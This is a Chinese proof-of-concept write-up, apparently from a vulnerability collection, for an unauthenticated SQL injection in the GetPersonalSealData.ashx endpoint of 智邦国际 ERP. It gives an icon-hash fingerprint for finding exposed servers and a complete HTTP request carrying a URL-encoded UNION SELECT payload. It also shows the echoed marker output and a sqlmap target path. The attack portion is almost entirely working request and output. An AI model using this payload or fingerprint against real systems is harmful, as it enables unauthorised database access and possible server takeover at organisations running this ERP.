POC00/智邦国际ERPGetPersonalSealData.ashx接口SQL注入漏洞.md

# 智邦国际ERP GetPersonalSealData.ashx接口SQL注入漏洞

# 一、漏洞复现
智邦国际ERP系统 GetPersonalSealData.ashx接口处存在SQL注入漏洞，未经身份认证的攻击者可利用此漏洞获取数据库敏感信息，深入利用可获取服务器权限。

# 二、影响版本
+ 智邦国际ERP

# 三、资产测绘
+ web.icon=="0ab4ed9764a33fd85da03b00f44393e1"
+ 特征

![1704883537136-4947553c-c91b-4350-a9c8-1df6e73b1ec8.png](./img/OhYF0vdN8XPJVPA_/1704883537136-4947553c-c91b-4350-a9c8-1df6e73b1ec8-639576.png)

# 四、漏洞复现
```java
GET /SYSN/json/pcclient/GetPersonalSealData.ashx?imageDate=1&userId=%31%20%55%4e%49%4f%4e%20%41%4c%4c%20%53%45%4c%45%43%54%20%43%48%41%52%28%31%31%33%29%2b%43%48%41%52%28%31%32%32%29%2b%43%48%41%52%28%39%38%29%2b%43%48%41%52%28%39%38%29%2b%43%48%41%52%28%31%31%33%29%2b%43%48%41%52%28%36%38%29%2b%43%48%41%52%28%31%31%30%29%2b%43%48%41%52%28%31%31%37%29%2b%43%48%41%52%28%31%31%31%29%2b%43%48%41%52%28%37%33%29%2b%43%48%41%52%28%38%36%29%2b%43%48%41%52%28%31%30%35%29%2b%43%48%41%52%28%37%30%29%2b%43%48%41%52%28%38%37%29%2b%43%48%41%52%28%31%31%37%29%2b%43%48%41%52%28%36%35%29%2b%43%48%41%52%28%37%36%29%2b%43%48%41%52%28%31%30%34%29%2b%43%48%41%52%28%38%32%29%2b%43%48%41%52%28%31%31%31%29%2b%43%48%41%52%28%31%30%35%29%2b%43%48%41%52%28%38%38%29%2b%43%48%41%52%28%31%31%38%29%2b%43%48%41%52%28%37%35%29%2b%43%48%41%52%28%31%30%31%29%2b%43%48%41%52%28%36%37%29%2b%43%48%41%52%28%31%30%31%29%2b%43%48%41%52%28%36%39%29%2b%43%48%41%52%28%38%39%29%2b%43%48%41%52%28%31%30%31%29%2b%43%48%41%52%28%36%36%29%2b%43%48%41%52%28%37%31%29%2b%43%48%41%52%28%31%30%38%29%2b%43%48%41%52%28%36%36%29%2b%43%48%41%52%28%37%33%29%2b%43%48%41%52%28%31%30%39%29%2b%43%48%41%52%28%31%30%31%29%2b%43%48%41%52%28%38%34%29%2b%43%48%41%52%28%38%35%29%2b%43%48%41%52%28%36%35%29%2b%43%48%41%52%28%31%31%30%29%2b%43%48%41%52%28%36%35%29%2b%43%48%41%52%28%39%38%29%2b%43%48%41%52%28%31%30%30%29%2b%43%48%41%52%28%38%37%29%2b%43%48%41%52%28%31%31%33%29%2b%43%48%41%52%28%31%31%33%29%2b%43%48%41%52%28%31%31%33%29%2b%43%48%41%52%28%31%31%33%29%2b%43%48%41%52%28%31%31%33%29%2d%2d%20%79%68%6c%73 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ASP.NET_SessionId=o0oxkf2lkudmy5ueprfeapbl
Upgrade-Insecure-Requests: 1
```

![1704886581249-064da2e0-8416-4202-a9ed-ad5d16488790.png](./img/OhYF0vdN8XPJVPA_/1704886581249-064da2e0-8416-4202-a9ed-ad5d16488790-137621.png)

```java
qzbbqDnuoIViFWuALhRoiXvKeCeEYeBGlBImeTUAnAbdWqqqqq
```

sqlmap

```java
/SYSN/json/pcclient/GetPersonalSealData.ashx?imageDate=1&userId=1
```

![1704886636864-d82ac9ca-3276-4b0a-aaa3-5ac1af53547c.png](./img/OhYF0vdN8XPJVPA_/1704886636864-d82ac9ca-3276-4b0a-aaa3-5ac1af53547c-432838.png)



> 更新: 2024-02-29 23:55:42  
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/eqzw1z2g14rwg6ue>